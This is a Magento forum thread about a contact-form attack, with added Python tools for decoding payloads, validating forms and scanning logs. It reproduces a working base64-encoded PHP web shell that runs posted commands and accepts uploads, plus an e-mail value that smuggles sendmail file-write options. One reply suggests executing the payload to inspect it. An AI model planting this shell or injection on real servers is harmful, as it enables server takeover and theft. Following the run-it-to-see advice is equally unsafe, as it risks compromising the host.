Today I got an e-mail from my own Magento store with the following message:
Naam: Wendy Rosenberg
E-mail: "Wendy\" -oQ/tmp/ -Xskin/test.php "@aol.com
Telefoon: 9549463828
<?php eval(base64_decode('JHNhZmVtMGRlID0gQGluaV9nZXQoJ3NhZmVfbW9kZScpOw0KaWYgKCEkc2FmZW0wZGUpIHskc2VjdXJpdHk9ICJPRkYiO30NCmVsc2UgeyRzZWN1cml0eT0gIk9OIjt9DQplY2hvICcNCjx0aXRsZT5jY2ZyZXNoIHNpbXBsZSBzaGVsbDwvdGl0bGU+DQo8aDM+PGEgaHJlZj0iaHR0cDovL2NjZnJlc2gubWwvIiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOm5vbmU7IiB0YXJnZXQ9Il9ibGFuayI+PGZvbnQgY29sb3I9ImJsdWUiPmNjZnJlc2gubWw8L2ZvbnQ+PC9hPjwvaDM+DQo8cD48Yj5SZWFkeSBTdG9jazwvYj48L2JyPg0KfCBDQyBGcmVzaCB8IE1haWxlciB8IExlYWRzIHwgc0hlbGwgfCBjUGFuZWwgfCBTU0ggfCBSRFAgfDwvcD4NCjxiPlNBRkVfTU9ERSA6ICcuJHNlY3VyaXR5Lic8L2I+PC9icj4NCjxiPlVuYW1lIDogJy5waHBfdW5hbWUoKS4nPC9iPjwvYnI+DQo8Yj51aWQ9ICcuZ2V0bXl1aWQoKS4nICgnLmdldF9jdXJyZW50X3VzZXIoKS4nKSBnaWQ9Jy5nZXRteWdpZCgpLic8L2I+PC9icj4NCjxiPmN3ZCA6ICcuZ2V0Y3dkKCkuJzwvYj48L2JyPg0KJzsNCj8+DQo8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iPD9waHAgZWNobyAkX1NFUlZFUlsnUEhQX1NFTEYnXTs/PiI+DQo8dGFibGU+DQo8dHI+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJnbyIgc2l6ZT0iMzUiPjwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJDb21tYW5kIiBzdHlsZT0id2lkdGg6IDc1cHg7IGhlaWdodDogMjBweDsiPjwvdGQ+PC90cj4NCjwvZm9ybT4NCjxmb3JtIG1ldGhvZD0iUE9TVCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSI8P3BocCBlY2hvICRfU0VSVkVSWydQSFBfU0VMRiddOz8+Ij4NCjx0cj48dGQ+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9Im15RmlsZSI+PC90ZD48dGQ+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ib2siIHZhbHVlPSJVcGxvYWQiIHN0eWxlPSJ3aWR0aDogNzVweDsgaGVpZ2h0OiAyMHB4OyI+PC90ZD48L3RyPg0KPC90YWJsZT4NCjwvZm9ybT4NCjw/cGhwDQppZiAoaXNzZXQoJF9QT1NUWydvayddKSAmJiBpc3NldCgkX0ZJTEVTWydteUZpbGUnXSkpIHsNCiRmaWxlID0gJF9GSUxFU1snbXlGaWxlJ11bJ3RtcF9uYW1lJ107DQokbmFtZSA9ICRfRklMRVNbJ215RmlsZSddWyduYW1lJ107DQppZiAoIW1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZSwgJG5hbWUpKSB7DQplY2hvICc8Yj48Zm9udCBjb2xvcj0icmVkIj5VbmFibGUgdG8gdXBsb2FkIGZpbGU8L2ZvbnQ+PC9iPic7DQp9IGVsc2Ugew0KZWNobyAnU3VjY2VzcyBVcGxvYWRlZCBGaWxlIDxiPjxmb250IGNvbG9yPSJncmVlbiI+Jy4kbmFtZS4nPC9mb250PjwvYj4nOw0KfQ0KfQ0KaWYgKGlzc2V0KCRfUE9TVFsnZ28nXSkpIHsNCmVjaG8gIjxwcmU+IjsNCnN5c3RlbSgkX1BPU1RbJ2dvJ10pOw0KZWNobyAiPC9wcmU+IjsNCmV4aXQ7DQp9'));?>
When I executed this PHP code, I got this web page.
What can I do to remove this hack?
My Magento version is 1.9.3.1.
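The safe way to find out what a wrapper like the one above does is to decode it and read it, never to run it. The following Python is an added example for this thread, not code from the original post or from Magento: it pulls the base64 blob out of every eval(base64_decode('...')) it finds, decodes it without executing anything, and lists which dangerous PHP functions the decoded source calls. The sample payload is constructed at runtime in the same shape as the quoted one (a form with a command field and a file upload); to triage the real thing, pass the quoted string to triage() instead.

```python
import base64
import re

# Constructed sample in the same shape as the payload quoted in the post:
# a PHP eval(base64_decode('...')) wrapper around a small upload-and-command
# script. The inner PHP is encoded at runtime, so it is a stand-in, not the
# string from the e-mail.
INNER_PHP = (
    '<form method="POST"><input name="go"><input type="file" name="myFile"></form>\n'
    "<?php\n"
    "if (isset($_POST['ok']) && isset($_FILES['myFile'])) {\n"
    "    move_uploaded_file($_FILES['myFile']['tmp_name'], $_FILES['myFile']['name']);\n"
    "}\n"
    "if (isset($_POST['go'])) { system($_POST['go']); }\n"
)
SAMPLE_PAYLOAD = (
    "<?php eval(base64_decode('"
    + base64.b64encode(INNER_PHP.encode()).decode()
    + "'));?>"
)

# Matches the wrapper and captures the base64 blob inside it.
WRAPPER_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)"
)

# PHP functions whose presence in an unknown script warrants attention,
# reported in this order.
SINKS = (
    "eval", "system", "exec", "shell_exec", "passthru",
    "move_uploaded_file", "base64_decode",
)


def decode_payload(text):
    """Return the decoded source of every eval(base64_decode('...')) wrapper in text.

    The decoded PHP is returned as a string and is never executed."""
    decoded = []
    for match in WRAPPER_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def find_sinks(php_source):
    """List the SINKS that are called somewhere in php_source, in SINKS order."""
    return [name for name in SINKS
            if re.search(r"\b" + re.escape(name) + r"\s*\(", php_source)]


def triage(text):
    """Summarise what each wrapped payload would do, from the decoded source alone."""
    report = []
    for src in decode_payload(text):
        report.append({
            "sinks": find_sinks(src),
            "reads_post": "$_POST" in src,
            "handles_upload": "$_FILES" in src,
        })
    return report


if __name__ == "__main__":
    for entry in triage(SAMPLE_PAYLOAD):
        print(entry)
```

A result listing system() and move_uploaded_file() together with $_POST and $_FILES is the signature of a web shell: if a file with that content is ever found under the web root, treat the server as compromised rather than just deleting the file.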
Accepted Solutions
We've got the same here.
After some analysis of our log files we recognized that the attacker sent the code through a contact form which I didn't know existed.
It's made by our template "Passion" by Magesolution.com.
It seems like the attacker tried to get some code in there over that form.
As a first step we blocked /contacts/ and /contacts/index/ via .htaccess:
RewriteCond %{REQUEST_URI} ^/contacts/index/?
RewriteRule ^(.*)$ https://yourdomain.com/? [L,R=301]
RewriteCond %{REQUEST_URI} ^/contacts/?
RewriteRule ^(.*)$ https://yourdomain.com/? [L,R=301]
As I looked up my log I didn't find any files placed. The request for a test.php resulted in a 404 error for him.
The attacker IP was: 148.251.173.52
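Blocking the contact URL stops this one form, but the underlying problem is the e-mail field itself: the value in the original post, "Wendy\" -oQ/tmp/ -Xskin/test.php "@aol.com, is not an address, it is an address with whitespace-separated tokens that look like sendmail options. The Python below is an added example (not code from this thread, from Magento or from the Magesolution template) of the check a form handler can run before the value reaches any mailer. The INJECTED and BENIGN values are constructed samples; validate_contact_form and its field names are this example's own.

```python
import re

# Constructed sample values. INJECTED has the shape of the e-mail field quoted
# in the original post: the quotes and whitespace smuggle sendmail-style
# options (-oQ, -X) into what should be a single address.
INJECTED = '"Wendy\\" -oQ/tmp/ -Xskin/test.php "@aol.com'
BENIGN = "wendy.rosenberg@example.com"

# Deliberately strict: one local part, one @, dotted domain, and no quotes,
# spaces or backslashes. This rejects some RFC-valid addresses, which is the
# point for a form whose value ends up in a mailer's sender argument.
STRICT_ADDRESS = re.compile(
    r"^[A-Za-z0-9._%+-]{1,64}@(?:[A-Za-z0-9-]{1,63}\.)+[A-Za-z]{2,}$"
)


def is_safe_sender(address):
    """True only if the value is a plain address that cannot carry extra argv tokens."""
    return bool(STRICT_ADDRESS.match(address))


def sendmail_option_tokens(address):
    """Whitespace-separated tokens that a sendmail-style binary would read as options."""
    return [tok for tok in address.split() if tok.startswith("-")]


def validate_contact_form(fields):
    """Return a list of (field, reason) problems; an empty list means the form may be sent.

    fields is a dict with the hypothetical keys name, email and telephone."""
    problems = []
    email = fields.get("email", "")
    if not is_safe_sender(email):
        problems.append(("email", "not a plain single address"))
    opts = sendmail_option_tokens(email)
    if opts:
        problems.append(("email", "contains option-like tokens: " + " ".join(opts)))
    # Header injection guard for the free-text fields: no raw line breaks.
    for name in ("name", "telephone"):
        value = fields.get(name, "")
        if "\r" in value or "\n" in value:
            problems.append((name, "contains a line break"))
    return problems


if __name__ == "__main__":
    for label, addr in (("benign", BENIGN), ("injected", INJECTED)):
        print(label, is_safe_sender(addr), sendmail_option_tokens(addr))
```

The second function is only there to make the log entry readable: when a rejected submission is logged, recording the option-like tokens (-oQ/tmp/ and -Xskin/test.php here) tells you at a glance that the attempt was aimed at writing a file through the mailer, not at sending spam.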
Re: Our website has been hacked with eval(base64_decode
Before this hack I had set the return-path to No, two weeks ago.
In my access log I find this:
148.251.173.52 - - [22/Jan/2017:12:22:25 +0100] "POST /contacts/index/post HTTP/1.1" 302 758 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36"
148.251.173.52 - - [22/Jan/2017:12:22:27 +0100] "GET /skin/test.php HTTP/1.1" 404 1295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36"
But I can't find the test.php in the skin folder.
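The two log lines above are the whole story of the attempt: a POST to the contact form, then two seconds later a GET for a .php file under /skin/ (a directory that should only serve static assets) from the same IP, answered with 404 because the file was never written. The Python below is an added example for this thread, not code from the posters or from Magento, that looks for exactly that chain in an access log; SAMPLE_LOG repeats the two quoted lines plus one constructed benign request, and the contact endpoint path and the static directories are taken from this thread.

```python
import re
from datetime import datetime

# Constructed log excerpt: the two lines quoted in the reply above, plus a
# benign request from another client for contrast.
SAMPLE_LOG = [
    '148.251.173.52 - - [22/Jan/2017:12:22:25 +0100] "POST /contacts/index/post HTTP/1.1" 302 758 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36"',
    '148.251.173.52 - - [22/Jan/2017:12:22:27 +0100] "GET /skin/test.php HTTP/1.1" 404 1295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36"',
    '203.0.113.7 - - [22/Jan/2017:12:23:01 +0100] "GET /skin/frontend/base/default/css/styles.css HTTP/1.1" 200 4210 "-" "Mozilla/5.0"',
]

# Apache combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# The contact-form endpoint seen in the thread, and directories that should
# serve only static assets, never PHP.
FORM_POST = re.compile(r"^/contacts/index/post$")
PHP_IN_STATIC_DIR = re.compile(r"^/(skin|media)/.*\.php(\?|$)")


def parse_line(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FORMAT),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def find_form_to_php_chains(lines, window_seconds=300):
    """Pair a contact-form POST with a later PHP request under a static path from the same IP.

    Returns one finding per such PHP request. Status 200 means the file exists
    and needs immediate attention; 404 means the write apparently failed."""
    events = [e for e in (parse_line(line) for line in lines) if e]
    events.sort(key=lambda e: e["ts"])
    posts_by_ip = {}
    findings = []
    for e in events:
        if e["method"] == "POST" and FORM_POST.match(e["path"]):
            posts_by_ip.setdefault(e["ip"], []).append(e["ts"])
        elif PHP_IN_STATIC_DIR.match(e["path"]):
            for post_ts in posts_by_ip.get(e["ip"], []):
                delay = (e["ts"] - post_ts).total_seconds()
                if 0 <= delay <= window_seconds:
                    findings.append({
                        "ip": e["ip"],
                        "path": e["path"],
                        "status": e["status"],
                        "seconds_after_post": delay,
                        "file_present": e["status"] == 200,
                    })
                    break
    return findings


if __name__ == "__main__":
    for finding in find_form_to_php_chains(SAMPLE_LOG):
        print(finding)
```

Run it over the full access log rather than a grep for test.php: the file name is the attacker's choice and will differ between attempts, while the POST-then-PHP-under-/skin/ sequence does not. Any finding with file_present True means a PHP file did land under the web root and the log line alone does not tell you what it contains.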
Re: Our website has been hacked with eval(base64_decode
Hello, I have had the same problem since today; I had also put the "Return-Path" to No. Have you got news about this?
Re: Our website has been hacked with eval(base64_decode
Not yet,
but have you received an e-mail with the same content?
Re: Our website has been hacked with eval(base64_decode
Yes, exactly the same, two times, and I turned "Return-Path" to "No" last week.
Re: Our website has been hacked with eval(base64_decode
I am still looking into what kind of hack this is.
What I have done is create a .php file with only the content of that PHP script:
<?php eval(base64_decode(.....));?>
Open that file in a web browser and you will see a web page with a link to ccfresh.ml.
You can also paste this content into the form on this website: http://ddecode.com/phpdecoder/
It has to do with credit card info, as you will see.
Can you inform me when you have solved this hack?
Re: Our website has been hacked with eval(base64_decode
I hope it's not a hack but an attempt to hack. I am unfortunately not educated enough to solve this problem.
Re: Our website has been hacked with eval(base64_decode
If I find something about it, I will give the information.
Re: Our website has been hacked with eval(base64_decode
Grueff2, thanks for solving this problem, and for the rewrite rules.
I didn't know of the existence of that mail form either.
My attacker has the same IP address, and comes from Germany.